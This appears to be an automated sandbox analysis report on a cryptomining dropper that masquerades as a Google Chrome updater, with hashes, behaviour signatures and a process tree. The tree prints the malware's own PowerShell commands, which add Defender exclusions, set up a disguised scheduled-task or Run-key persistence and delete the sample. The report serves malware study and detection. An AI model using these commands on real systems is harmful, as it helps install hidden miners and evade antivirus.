Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
311s -
max time network
1799s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23-01-2024 19:27
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1740 created 1224 1740 LM3BR4UBmKBzBP5H.exe 15 PID 1740 created 1224 1740 LM3BR4UBmKBzBP5H.exe 15 PID 1740 created 1224 1740 LM3BR4UBmKBzBP5H.exe 15 PID 1740 created 1224 1740 LM3BR4UBmKBzBP5H.exe 15 PID 2904 created 1224 2904 updater.exe 15 PID 2904 created 1224 2904 updater.exe 15 PID 2904 created 1224 2904 updater.exe 15 PID 2904 created 1224 2904 updater.exe 15 PID 572 created 1224 572 conhost.exe 15 PID 2904 created 1224 2904 updater.exe 15 -
XMRig Miner payload 31 IoCs
resource yara_rule behavioral17/memory/1560-64-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-71-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-73-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-75-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-101-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-103-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-105-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-109-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-113-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-115-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral17/memory/1560-135-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2568 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2904 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 1932 taskeng.exe -
resource yara_rule behavioral17/memory/1560-64-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-71-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-73-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-75-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-101-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-103-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-105-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-109-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-113-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-115-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral17/memory/1560-135-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2904 set thread context of 572 2904 updater.exe 50 PID 2904 set thread context of 1560 2904 updater.exe 53 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe LM3BR4UBmKBzBP5H.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2756 schtasks.exe 660 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1720 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 50874f523151da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1740 LM3BR4UBmKBzBP5H.exe 1740 LM3BR4UBmKBzBP5H.exe 2436 powershell.exe 1740 LM3BR4UBmKBzBP5H.exe 1740 LM3BR4UBmKBzBP5H.exe 2952 powershell.exe 1740 LM3BR4UBmKBzBP5H.exe 1740 LM3BR4UBmKBzBP5H.exe 1740 LM3BR4UBmKBzBP5H.exe 1740 LM3BR4UBmKBzBP5H.exe 2764 powershell.exe 2904 updater.exe 2904 updater.exe 3044 powershell.exe 2904 updater.exe 2904 updater.exe 2140 powershell.exe 2904 updater.exe 2904 updater.exe 2904 updater.exe 2904 updater.exe 572 conhost.exe 572 conhost.exe 2904 updater.exe 2904 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 2904 updater.exe Token: SeAssignPrimaryTokenPrivilege 1720 WMIC.exe Token: SeIncreaseQuotaPrivilege 1720 WMIC.exe Token: SeSecurityPrivilege 1720 WMIC.exe Token: SeTakeOwnershipPrivilege 1720 WMIC.exe Token: SeLoadDriverPrivilege 1720 WMIC.exe Token: SeSystemtimePrivilege 1720 WMIC.exe Token: SeBackupPrivilege 1720 WMIC.exe Token: SeRestorePrivilege 1720 WMIC.exe Token: SeShutdownPrivilege 1720 WMIC.exe Token: SeSystemEnvironmentPrivilege 1720 WMIC.exe Token: SeUndockPrivilege 1720 WMIC.exe Token: SeManageVolumePrivilege 1720 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1720 WMIC.exe Token: SeIncreaseQuotaPrivilege 1720 WMIC.exe Token: SeSecurityPrivilege 1720 WMIC.exe Token: SeTakeOwnershipPrivilege 1720 WMIC.exe Token: SeLoadDriverPrivilege 1720 WMIC.exe Token: SeSystemtimePrivilege 1720 WMIC.exe Token: SeBackupPrivilege 1720 WMIC.exe Token: SeRestorePrivilege 1720 WMIC.exe Token: SeShutdownPrivilege 1720 WMIC.exe Token: SeSystemEnvironmentPrivilege 1720 WMIC.exe Token: SeUndockPrivilege 1720 WMIC.exe Token: SeManageVolumePrivilege 1720 WMIC.exe Token: SeLockMemoryPrivilege 1560 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2952 wrote to memory of 2756 2952 powershell.exe 32 PID 2952 wrote to memory of 2756 2952 powershell.exe 32 PID 2952 wrote to memory of 2756 2952 powershell.exe 32 PID 2568 wrote to memory of 2652 2568 cmd.exe 34 PID 2568 wrote to memory of 2652 2568 cmd.exe 34 PID 2568 wrote to memory of 2652 2568 cmd.exe 34 PID 2764 wrote to memory of 2576 2764 powershell.exe 38 PID 2764 wrote to memory of 2576 2764 powershell.exe 38 PID 2764 wrote to memory of 2576 2764 powershell.exe 38 PID 1932 wrote to memory of 2904 1932 taskeng.exe 40 PID 1932 wrote to memory of 2904 1932 taskeng.exe 40 PID 1932 wrote to memory of 2904 1932 taskeng.exe 40 PID 2140 wrote to memory of 660 2140 powershell.exe 45 PID 2140 wrote to memory of 660 2140 powershell.exe 45 PID 2140 wrote to memory of 660 2140 powershell.exe 45 PID 2904 wrote to memory of 572 2904 updater.exe 50 PID 984 wrote to memory of 1720 984 cmd.exe 51 PID 984 wrote to memory of 1720 984 cmd.exe 51 PID 984 wrote to memory of 1720 984 cmd.exe 51 PID 2904 wrote to memory of 1560 2904 updater.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2756
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2576
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:660
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1508
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:572
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2652
-
C:\Windows\system32\taskeng.exetaskeng.exe {1EF8B702-8E46-44F9-9D68-D2225E1409FA} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
321KB
MD5d766bbb81e5dec4661027d9f4808f194
SHA1e2fe27435dab127e36e0db968c8e92b127c3fb21
SHA256605f19657a25bee03db5d7f04f781054a4b2abdb0e8596ca577fe33b2518a0b1
SHA51201585124d233ae4e0d2d1ded3a39b5a88359523f9c39054c57c4e059f4c71aed2c169ee6e93b69e7c6ac12dc11cb72298ca3f8ea2eba198eab34244d0696a7cf
-
Filesize
1.1MB
MD5dbd78596b811066ff733feefd55b6cbb
SHA1ec8eb3c3fc7c8e412d045074ce1bd930a3f99643
SHA256245ae7262cae661b5b99933555d675d6492928b60aae3471c5fbf4ab33046cf3
SHA512999915e42082776b0b4a561459e8de23c2c1f0d327cece829e537fe5a13b130c6ec521b76bdeed852038bdff129940e4702a3ca232fcfaaf24ac056609d4e839
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YQHRCSHMI2XJS5MQRXO5.temp
Filesize7KB
MD5d17c68a9e3ffcb19918589ca38688f92
SHA167a87b9494913771c0943425ed9d43fd19f022ce
SHA2569fca64474c8b54cd40e5682d41aab6cfa086fc838f3cd756863771dd1f191753
SHA512ee192b19d643df57055182d9ccc29d699220bcddf7ea0709577907f1aed7f3309439ad70b742038a1baa15beee9ddd5820c2f10501c88b0868500e0b20174698
-
Filesize
187KB
MD5029f74d2e52f817494f78b17c94ee60a
SHA136694178a79a452cc78e9d86f36c40cb9c6356b5
SHA2565642843af156c58a2034829a5139865dcb506d21889fecbb81838d670a32d65e
SHA512a76857b435516a4479de215cc57ca519ff66578083b15a2cb2a6c8ab3f3674deef63aa284f52a89a899e72dff37aad58e579117aba07fb2bd45e6a6852e4ffab